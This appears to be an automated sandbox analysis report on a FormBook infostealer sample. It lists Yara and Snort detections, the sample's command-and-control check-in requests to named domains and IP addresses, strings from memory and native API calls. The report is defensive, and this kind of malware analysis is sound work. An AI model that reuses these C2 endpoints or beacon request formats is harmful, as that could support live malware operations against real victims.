Source: Yara match	File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: JdtN8nIcLi8RQOi.exe

Joe Sandbox ML: detected

Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: JdtN8nIcLi8RQOi.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: JdtN8nIcLi8RQOi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
Source:	Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h		0_2_01BAD530
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h		0_2_01BAD520

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80

Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 192.185.0.218 192.185.0.218

Source: Joe Sandbox View	ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.bimetalthermostatksd.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:40:18 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei

Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: WWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmp	String found in binary or memory: http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_004181B0 NtCreateFile,	1_2_004181B0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00418260 NtReadFile,	1_2_00418260
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_004182E0 NtClose,	1_2_004182E0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00418390 NtAllocateVirtualMemory,	1_2_00418390
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_004181AB NtCreateFile,	1_2_004181AB
